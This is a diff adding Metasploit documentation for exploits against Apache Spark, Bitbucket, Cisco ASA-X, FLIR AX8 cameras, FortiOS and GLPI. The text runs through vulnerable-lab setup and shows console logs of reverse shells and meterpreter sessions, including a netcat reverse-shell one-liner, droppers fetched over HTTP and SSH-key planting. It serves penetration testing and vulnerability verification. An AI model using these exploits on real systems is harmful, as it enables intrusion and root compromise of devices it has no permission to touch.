+    Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
+    Utils.executeAndGetOutput(idPath ::  "-Gn" :: username :: Nil).stripLineEnd.split(" ").toSet
+  }
+}
+```
+
+This will result in arbitrary shell command execution as the user `Spark`.
+
+This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1
+
+Installing a vulnerable version of Apache Spark to test this vulnerability is quite easy.
+
+To set the server up use the following docker-compose.yml file and follow the steps below:
+```
+version: '2'
+
+services:
+  spark:
+    image: docker.io/bitnami/spark:3.1.1
+    environment:
+      - SPARK_MODE=master
+      - SPARK_RPC_AUTHENTICATION_ENABLED=no
+      - SPARK_RPC_ENCRYPTION_ENABLED=no
+      - SPARK_LOCAL_STORAGE_ENCRYPTION_ENABLED=no
+      - SPARK_SSL_ENABLED=no
+    ports:
+      - '8080:8080'
+```
+
+1. Create the docker-compose.yml in your preferred directory and run `docker-compose up`. Let the container spin up.
+1. In a new terminal, enter `sudo docker exec -it spark_spark_1 /bin/bash`
+1. In the container bash session, enter: `echo "spark.acls.enable true" >> conf/spark-defaults.conf`
+1. cat the contents of spark-defaults.conf to make sure it looks good.
+1. Exit the interactive bash shell and Ctrl-C your docker-compose process.
+1. Once the containers have powered down gracefully, rerun `docker-compose up`
+
+Once the server and application is up, it's vulnerable and you can access it on port 8080 for testing...
+
+## Verification Steps
+
+1. `use exploit/linux/http/apache_spark_rce_cve_2022_33891`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set LHOST <Address of Attacking Machine>`
+1. `exploit`
+1. You should get a shell or meterpreter as the `spark` user.
+
+## Options
+
+No specific options to be set.
+
+## Scenarios
+
+### Apache Spark version 3.1.1 on Linux 5.10.104-linuxkit with spark.acls.enable set to true
+
+```
+msf6 > use exploit/linux/http/apache_spark_rce_cve_2022_33891
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > set rhosts 192.168.100.43
+rhosts => 192.168.100.43
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > options
+
+Module options (exploit/linux/http/apache_spark_rce_cve_2022_33891):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.100.43   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      8080             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The URI of the vulnerable instance
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.100.7    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix (In-Memory)
+
+
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.43:8080 can be exploited!
+[*] Perform sleep test of 10 seconds...
+[+] The target is vulnerable. Sleep was around 10 seconds [10.033867019]!
+[*] Exploiting...
+[*] Sending stage (40164 bytes) to 192.168.100.43
+[-] Meterpreter session 3 is not valid and will be closed
+[*] 192.168.100.43 - Meterpreter session 3 closed.
+[*] Sending stage (40168 bytes) to 192.168.100.43
+[*] Meterpreter session 4 opened (192.168.100.7:4444 -> 192.168.100.43:62618) at 2022-08-26 10:49:46 +0000
+
+meterpreter > sysinfo
+Computer     : 7a26a9fb7ce3
+OS           : Linux 5.10.104-linuxkit #1 SMP Thu Mar 17 17:08:06 UTC 2022
+Architecture : x64
+Meterpreter  : python/linux
+meterpreter > getuid
+Server username: spark
+```
+
+### Apache Spark version 3.1.1 on Linux 5.10.104-linuxkit WITHOUT the spark.acls.enable option
+
+Note: This version is vulnerable, however the `spark.acls.enable` option is not set, hence the vulnerable code will not be triggered.
+Response on POST payload request will be 200 instead of 403.
+
+```
+msf6 > use exploit/linux/http/apache_spark_rce_cve_2022_33891
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > set rhosts 192.168.100.43
+rhosts => 192.168.100.43
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > options
+
+Module options (exploit/linux/http/apache_spark_rce_cve_2022_33891):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.100.43   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      8080             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The URI of the vulnerable instance
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.100.7    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix (In-Memory)
+
+
+msf6 exploit(inux/http/apache_spark_rce_cve_2022_33891) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.43:8080 can be exploited!
+[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. The 192.168.100.43:8080 did not respond a 403 response. "set ForceExploit true" to override check result.
+[*] Exploit completed, but no session was created.
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) >
+```
+
+## Limitations
+The check to determine if the application is vulnerable is based on a 403 response and the execution of a randomized `sleep` command.
+The exploit is a blind command injection, so there is nothing reflected back on the page during the command execution.
+Timing the sleep command execution is therefore a pretty safe bet to check if the command injection is successful.
+
+Credits goes to HuskyHacks that used this test in his [POC](https://github.com/HuskyHacks/cve-2022-33891) on GitHub.
@@ -0,0 +1,118 @@
+## Vulnerable Application
+
+Various versions of Bitbucket Server and Data Center are vulnerable to
+an unauthenticated command injection vulnerability in multiple API endpoints.
+
+The `/rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive` endpoint
+creates an archive of the repository, leveraging the `git-archive` command to do so.
+Supplying NULL bytes to the request enables the passing of additional arguments to the
+command, ultimately enabling execution of arbitrary commands.
+
+According to the [advisory](https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html), vulnerable versions of Bitbucket are:
+
+  Any version released after version `6.10.17` and before:
+          * `7.6.17`
+          * `7.17.10`
+          * `7.21.4`
+          * `8.0.3`
+          * `8.1.3`
+          * `8.2.2`
+          * `8.3.1`
+
+Download archives can be found [here](https://www.atlassian.com/software/bitbucket/download-archives).
+    
+### Installation Instructions
+
+1. Install Git on the target machine
+  * sudo apt install -y git
+2. Download a vulnerable version of Bitbucket. For example, version `8.2.1` can be found
+[here](https://www.atlassian.com/software/stash/downloads/binary/atlassian-bitbucket-8.2.1-x64.bin)
+3. Make sure the resulting bin file is executable and run it
+  * chmod +x atlassian-bitbucket-8.3.0-x64.bin && sudo ./atlassian-bitbucket-8.3.0-x64.bin
+4. An installation wizard will pop up. Make sure `Install a new instance` is checked, then click `Next`
+5. Check `Install a Server instance` and click `Next`
+6. If the default destination directory looks good, click `Next`
+7. Click `Next` if the default Bitbucket data directory looks fine
+8. Make sure the `Use default HTTP port (7990)` selection is checked and click `Next`
+9. Make sure the `Install Bitbucket as a service` box is checked and click `Next`
+10. Click `Install` if everything looks correct on the summary screen
+11. Once the installation completes, make sure the `Would you like to launch Bitbucket` option is selected
+and click `Next`
+12. Ensure `Launch Bitbucket <version> in browser` is selected and click `Finish`
+13. Navigate to the Bitbucket setup page (http://localhost:7990) and select the `I need an evaluation license` option
+14. If you already have an account, select `I have an account`; otherwise, create a new account
+15. 'up and running' should be selected on the next page, so click `Generate License`
+16. Confirm that the prompt gives you the correct server, then click `Yes`
+17. The license should be entered in the box, so select `Next`
+18. Finally, set up an administrator account
+
+*Note*: If an error occurs on the last step, just open a browser and navigate to the setup
+page at 127.0.0.1:7990
+
+### Vulnerable Setup
+
+1. Log into Bitbucket with your administrator credentials
+2. Once logged in, select `Projects` at the top menu
+3. Select `Create project`
+4. Enter a name for the project and click `Create project`
+5. On the next page, select `Create repository`
+6. Enter a name for the repository and select `Create repository`
+7. Follow the instructions to clone the repository and push data to the repository so it is not empty
+8. Click the gear on the left side of the next page
+9. Select `Repository permissions` under `Security` on the left
+10. Underneath `Public access`, check `Enable` to make the repository public
+
+Bitbucket should now be exploitable
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/bitbucket_git_cmd_injection`
+4. Do: `run`
+5. You should get a shell.
+
+## Options
+
+### USERNAME
+
+An optional username to authenticate to Bitbucket with
+
+### PASSWORD
+
+An optional password to authenticate to Bitbucket with
+
+### Bitbucket version 8.2.1 on Ubuntu 22.04
+
+```
+msf6 > use exploit/linux/http/bitbucket_git_cmd_injection
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set rhost 192.168.140.216
+rhost => 192.168.140.216
+msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(linux/http/bitbucket_git_cmd_injection) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Searching Bitbucket for publicly accessible repository
+[+] Found public repo 'repo_name' in project 'TEST'!
+[*] Using URL: http://192.168.140.1:8080/7SGXRWRlXr8t
+[*] Client 192.168.140.216 (Wget/1.21.2) requested /7SGXRWRlXr8t
+[*] Sending payload to 192.168.140.216 (Wget/1.21.2)
+[*] Sending stage (3020772 bytes) to 192.168.140.216
+[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.216:57994) at 2022-09-20 18:40:27 -0500
+[*] Command Stager progress - 100.00% done (118/118 bytes)
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: atlbitbucket
+meterpreter > sysinfo
+Computer     : 192.168.140.216
+OS           : Ubuntu 22.04 (Linux 5.15.0-48-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,152 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits an authenticated command injection vulnerability affecting
+Cisco ASA-X with FirePOWER Services. This exploit is executed through the ASA's
+ASDM web server and lands in the FirePower Services SFR module's Linux virtual
+machine as the root user. Access to the virtual machine allows the attacker to
+pivot to the inside network, and access the outside network. Also, the SFR
+virtual machine is running snort on the traffic flowing through the ASA, so
+the attacker should have access to this diverted traffic as well.
+
+This module requires ASDM credentials in order to traverse the ASDM interface.
+A similar attack can be performed via Cisco CLI (over SSH), although that isn't
+implemented here. This attack also assumes the module is installed and
+configured.
+
+Finally, it's worth noting that this attack bypasses the effects of the
+`lockdown-sensor` command (e.g. the virtual machine's bash shell shouldn't be
+available but this attack makes it available).
+
+Cisco assigned this issue CVE-2022-20828. The issue affects all Cisco ASA that
+support the ASA FirePOWER module (at least Cisco ASA-X with FirePOWER Service,
+and Cisco ISA 3000). The vulnerability has been patched in ASA FirePOWER module
+versions 6.2.3.19, 6.4.0.15, 6.6.7, and 7.0.21. The following versions will
+receive no patch: 6.2.2 and earlier, 6.3.*, 6.5.*, and 6.7.*.
+
+### Setup
+
+Cisco ASA that support the FirePOWER Services module are, to our knowledge,
+strictly hardware firewalls and not capable of being emulated. As such,
+testing requires a physical device. Once a device is acquired, you'll
+additionally need access to Cisco downloads of ASDM, ASA software, and the
+FirePOWER Services Software for ASA. Unfortunately, Cisco hides these
+behind a paywall (or a "contract" wall).
+
+However, if you do acquire a Cisco ASA that supports the FirePOWER Services
+module, then it will likely come with the module pre-installed. These systems
+do support downgrading of the module via uninstall and reinstallation. If
+you need to follow that course, then I found the following [guide](https://www.cisco.com/c/en/us/support/docs/security/asa-firepower-services/118644-configure-firepower-00.html#anc5) to be an excellent guide that
+demonstrates how to install the FirePOWER module from boot image through
+full installation.
+
+This particular module exploits the FirePOWER module via ASDM, so you'll need
+that installed and running as well. Likely, the ASA will have an ASDM binary
+package already installed, but if not you'll need to download that from Cisco
+and copy it onto the ASA. However, once that is complete, you can run the
+following commands to start ASDM and enable it on the inside/outside network.
+
+```
+asdm image disk0:/asdm<version>.bin
+http server enable
+http network mask inside
+http network mask outside
+```
+
+Where network and mask are who you want to be able to access it and inside
+is the zone. E.g. "0.0.0.0 0.0.0.0 outside" is the internet. And that should
+satisfy the pre-requisites for exploitation (ASDM+sfr).
+
+## Verification Steps
+
+* Follow setup steps above.
+* Do: `use exploit/linux/http/cisco_asax_sfr_rce`
+* Do: `set USERNAME <username>`
+* Do: `set PASSWORD <password>`
+* Do: `set RHOST <ip>`
+* Do: `set LHOST <ip>`
+* Do: `check`
+* Verify the remote host is vulnerable.
+* Do: `run`
+* Verify the module acquires a root shell
+
+## Options
+
+### USERNAME
+
+The username to authenticate with the ASDM http web server with.
+
+### PASSWORD
+
+The password to authenticate with the ASDM http web server with.
+
+## Scenarios
+
+### Successful exploitation of ASA 5506-X with FirePOWER Services for a root shell
+
+```
+msf6 > use exploit/linux/http/cisco_asax_sfr_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set USERNAME admin
+USERNAME => admin
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set PASSWORD labpass1
+PASSWORD => labpass1
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set LHOST 10.0.0.2
+LHOST => 10.0.0.2
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set RHOST 10.0.0.21
+RHOST => 10.0.0.21
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > check
+[+] 10.0.0.21:443 - The target is vulnerable. Successfully executed the 'id' command.
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > run
+
+[*] Started reverse TCP handler on 10.0.0.2:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Successfully executed the 'id' command.
+[*] Executing Shell Dropper for cmd/unix/reverse_bash
+[*] Command shell session 1 opened (10.0.0.2:4444 -> 10.0.0.21:43056 ) at 2022-04-21 12:49:15 -0700
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux firepower 3.10.107sf.cisco-1 #1 SMP PREEMPT Thu Mar 8 18:29:04 UTC 2018 x86_64 GNU/Linux
+```
+
+### Successful exploitation of ASA 5506-X with FirePOWER Services for a Meterpreter shell
+
+```
+msf6 > use exploit/linux/http/cisco_asax_sfr_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set USERNAME admin
+USERNAME => admin
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set PASSWORD labpass1
+PASSWORD => labpass1
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set LHOST 10.0.0.2
+LHOST => 10.0.0.2
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set RHOST 10.0.0.21
+RHOST => 10.0.0.21
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > check
+[+] 10.0.0.21:443 - The target is vulnerable. Successfully executed the 'id' command.
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set TARGET 1
+TARGET => 1
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > run
+
+[*] Started reverse TCP handler on 10.0.0.2:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Successfully executed the 'id' command.
+[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_tcp
+[*] Using URL: http://10.0.0.2:8080/FeB2t5vKpa
+[*] Client 10.0.0.21 (curl/7.48.0) requested /FeB2t5vKpa
+[*] Sending payload to 10.0.0.21 (curl/7.48.0)
+[*] Meterpreter session 2 opened (10.0.0.2:4444 -> 10.0.0.21:43058 ) at 2022-04-21 12:51:44 -0700
+[*] Command Stager progress - 100.00% done (111/111 bytes)
+[*] Server stopped.
+
+meterpreter > shell
+Process 6315 created.
+Channel 1 created.
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux firepower 3.10.107sf.cisco-1 #1 SMP PREEMPT Thu Mar 8 18:29:04 UTC 2018 x86_64 GNU/Linux
+```
@@ -0,0 +1,180 @@
+## Vulnerable Application
+
+FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras
+that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment.
+This device is typically used for monitoring industrial environments in a LAN based configuration.
+Occasionally you can find a FLIR AX8 device where the HTTP web interface is exposed to the public internet.
+
+FLIR AX8 is affected by an unauthenticated remote command injection vulnerability.
+This can be exploited to inject and execute arbitrary shell commands as the root user through the `id` HTTP POST parameter
+in `res.php` endpoint.
+A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges.
+This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.
+
+The endpoint `/res.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID`
+to check if the request is legitimate. The second problem is that the POST parameter id can be injected to execute any unix command.
+
+Installing a vulnerable test bed requires a FLIR AX8 camera with the vulnerable firmware loaded.
+
+This module has been tested against a FLIR AX8 camera with the specifications listed below:
+
+* FLIR AX8 thermal camera
+* Firmware v1.40.16
+
+## Verification Steps
+
+1. `use exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set LHOST <attacker host ip>`
+1. `set LPORT <attacker host port>`
+1. `set TARGET <0-Unix command or 1-Linux Dropper>`
+1. `exploit`
+1. You should get a `netcat` shell or `meterpreter` session depending on the target and payload settings.
+
+## Options
+No specific options.
+
+## Scenarios
+
+### FLIR AX8 netcat reverse shell
+
+```
+msf6 > use exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061
+[*] Using configured payload cmd/unix/reverse_netcat
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > options
+
+Module options (exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all add
+                                       resses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_netcat):
+
+   Name   Current Setting    Required  Description
+   ----   ---------------    --------  -----------
+   LHOST                     yes       The listen address (an interface may be specified)
+   LPORT                     yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set lport 4444
+lport => 4444
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set target 0
+target => 0
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.180:80 can be exploited!
+[*] Performing command injection test issuing a sleep command of 10 seconds.
+[*] Elapsed time: 10.947262728999704 seconds.
+[+] The target is vulnerable. Successfully tested command injection.
+[*] Executing Unix Command with mkfifo /tmp/eyhxvh; nc 192.168.100.7 4444 0</tmp/eyhxvh | /bin/sh >/tmp/eyhxvh 2>&1; rm /tmp/eyhxvh
+[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:37980) at 2022-10-21 07:00:16 +0000
+
+whoami
+root
+uname -a
+Linux neco 3.0.35-flir #1 PREEMPT Thu Oct 20 08:20:20 CET 2022 armv7l GNU/Linux
+exit
+```
+
+### FLIR AX8 meterpreter session
+
+```
+msf6 > use exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061
+[*] Using configured payload linux/armle/meterpreter_reverse_tcp
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > options
+
+Module options (exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to li>
+                                       resses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (linux/armle/meterpreter_reverse_tcp):
+
+   Name   Current Setting    Required  Description
+   ----   ---------------    --------  -----------
+   LHOST                     yes       The listen address (an interface may be specified)
+   LPORT                     yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set lport 4444
+lport => 4444
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set target 1
+target => 1
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.180:80 can be exploited!
+[*] Performing command injection test issuing a sleep command of 7 seconds.
+[*] Elapsed time: 7.929586360999565 seconds.
+[+] The target is vulnerable. Successfully tested command injection.
+[*] Executing Linux Dropper
+[*] Using URL: http://0.0.0.0:8080/GOCjBdalaU
+[*] Client 127.0.0.1 (curl/7.33.0) requested /GOCjBdalaU
+[*] Sending payload to 127.0.0.1 (curl/7.33.0)
+[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:56540) at 2022-10-21 07:02:57 +0000
+[*] Command Stager progress - 100.00% done (125/125 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 192.168.100.180
+OS           :  (Linux neco 3.0.35-flir)
+Architecture : armv7l
+BuildTuple   : armv5l-linux-musleabi
+Meterpreter  : armle/linux
+meterpreter > getuid
+Server username: root
+meterpreter >
+```
+
+## Limitations
+Staged payloads like `linux/armle/meterpreter/reverse_tcp` or `linux/armle/shell/reverse_tcp` do not work.
+Manually tested these payloads with `msfvenom`, but they produce segmentation faults when executed on the target.
+However stageless payloads such as `linux/armle/meterpreter_reverse_tcp` and `linux/armle/shell_reverse_tcp` are working.
@@ -0,0 +1,95 @@
+## Vulnerable Application
+
+An authentication bypass using an alternate path or channel vulnerability [CWE-288] in FortiOS (firewall)
+FortiProxy (web proxy), and FortiSwitch Manager products. The vulnerability allows remote, unauthenticated user to
+bypass authentication and gain access to the administrative interface of these products by using a specially
+crafted http/s request.
+
+On October 3, 2022, Fortinet released a software update that addressed this vulnerability (CVE-2022-40684).
+
+The following products are affected:
+
+- FortiOS 7.0.0 to 7.0.6
+- FortiOS 7.2.0 to 7.2.1
+- FortiProxy 7.0.0 to 7.0.6
+- FortiProxy 7.2.0
+- FortiSwitchManager 7.0.0
+- FortiSwitchManager 7.2.0
+
+### Exploitation
+
+This module will abuse the authentication bypass vulnerability in the affected products to add a new ssh public
+key in the authorized keys of the target user (if no user is provied it'll try to detect it) and then connect
+over ssh to the target system (if no ssh private key is provided this module will automatically generate one).
+
+To do so it will add the following header in all HTTP requests:
+```
+User-Agent: Report Runner
+Forwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"
+```
+
+This module doesn't intend to overwrite the ssh keys already configured in the target system, it intends to
+**add** a new key in the last slot, if it is available or overwriting it.
+
+Even though the `check` detects the system as vulnerable, it performs a further validation if the ssh port is open and will fail otherwise.
+
+After a successful exploitation it will remove the just added key as a clean-up process. We assume it is the last key.
+
+## Verification Steps
+Confirm that functionality works:
+
+1. Start `msfconsole`
+1. `use exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684`
+1. set `RHOSTS`
+1. set `HttpTrace true` (optional)
+1. set `SSH_DEBUG true` (optional)
+1. set `VERBOSE true` (optional)
+1. `exploit`
+1. Confirm you have now a cmd session
+
+## Options
+
+### TARGETURI (required)
+
+The path to the Fotigate API (Default: `/`).
+
+### USERNAME (required)
+
+The username of the targed user (Default: `admin`).
+
+### PRIVATE_KEY (optional)
+
+The path for the SSH private key to be used to authenticate. It must be in PEM format.
+
+Example how to generate it:
+```
+ssh-keygen -t rsa -m PEM -f `openssl rand -hex 8`
+```
+
+### KEY_PASS (optional)
+
+The password for a given SSH private key (if it has one).
+
+### SSH_RPORT (required)
+
+The SSH port to connnect to (Default: `22`)
+
+## Scenarios
+
+### vulnerable application version and OS
+This module has been tested successfully on FortiGate v7.2.0.
+
+```
+msf6 exploit(linux/http/fortinet_authentication_bypass_cve_2022_40684) > exploit 
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking XXX.XXX.XXX.XXX:443
+[+] The target appears to be vulnerable. Target seems vulnerable
+[*] Executing exploit on Interactive SSH
+[*] Establishing SSH connection
+[*] SSH session 1 opened (172.25.226.18:38791 -> XXX.XXX.XXX.XXX:22) at 2022-10-15 04:00:41 +0200
+
+FW01 #  get sys status
+Version: FortiGate-100F v7.2.0,build1157,220331 (GA.F)
+Firmware Signature: certified 
+```
@@ -0,0 +1,146 @@
+## Vulnerable Application
+
+GLPI versions 10.0.2 and below expose a vulnerable version on htmLawed which
+has a php command injection opportunity.
+
+### Installation Instructions
+Taken verbatim from https://www.imaginelinux.com/install-glpi-ubuntu/
+Using  Ubuntu x64 Desktop 20.04.1
+1. ```sudo apt install apache2 php7.4 php7.4-curl php7.4-zip php7.4-gd php7.4-intl \
+   php7.4-intl php-pear php7.4-imagick php-bz2 php7.4-imap php-memcache php7.4-pspell \
+   php7.4-tidy php7.4-xmlrpc php7.4-xsl php7.4-mbstring php7.4-ldap php-cas php-apcu \
+   libapache2-mod-php7.4 php7.4-mysql mariadb-server```
+2. `sudo systemctl status apache2`
+3. `sudo systemctl status mariadb`
+4. `sudo mysql_secure_installation` # Answer 'yes' to everything
+5. `sudo mysql -u root -p`
+6. `CREATE DATABASE glpidb;`
+7. `GRANT ALL PRIVILEGES ON glpidb.* TO 'user'@'localhost' IDENTIFIED BY 'password';`
+8. `FLUSH PRIVILEGES;`
+9. `exit;`
+10. Grab a vulnerable version here: https://github.com/glpi-project/glpi/releases/
+11. Extract that vulnerable version and move the files to `/var/www/html/glpi/`
+12. `sudo chmod 755 -R /var/www/html/`
+13. `sudo chown www-data:www-data -R /var/www/html/`
+14. Create a virtual host if you want `sudo nano /etc/apache2/sites-available/glpi.conf`
+```<VirtualHost *:80>
+   ServerAdmin admin@your_domain.com
+   DocumentRoot /var/www/html/glpi
+   ServerName your-domain.com
+
+   <Directory /var/www/html/glpi>
+        Options FollowSymlinks
+        AllowOverride All
+        Require all granted
+   </Directory>
+
+   ErrorLog ${APACHE_LOG_DIR}/your-domain.com_error.log
+   CustomLog ${APACHE_LOG_DIR}/your-domain.com_access.log combined
+
+</VirtualHost>
+```
+
+15. `sudo ln -s /etc/apache2/sites-available/glpi.conf /etc/apache2/sites-enabled/glpi.conf`
+16. `sudo a2enmod rewrite`
+17. `sudo systemctl restart apache2`
+18. Visit the new server at http://<yourhost>/glpi
+19. Follow setup instructions on screen
+
+## Options
+No extra options to be set, but make sure the uripath is correct
+
+## Verification Steps
+* Do: `msfconsole`
+* Do: `use exploit/linux/http/glpi_htmlawed_php_injection`
+* Do: `set upripath <uripath>`
+* Do: `set rhost <rhost>`
+* Do: `set lhost <lhost>`
+* Do: **Verify** you get a session
+
+## Scenarios
+### Using GLPI 9.5.9 running on Ubuntu 20.04.1 x64
+#### Linux Dropper
+```
+msf6 exploit(linux/http/glpi_htmlawed_php_injection) > show options
+
+Module options (exploit/linux/http/glpi_htmlawed_php_injection):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
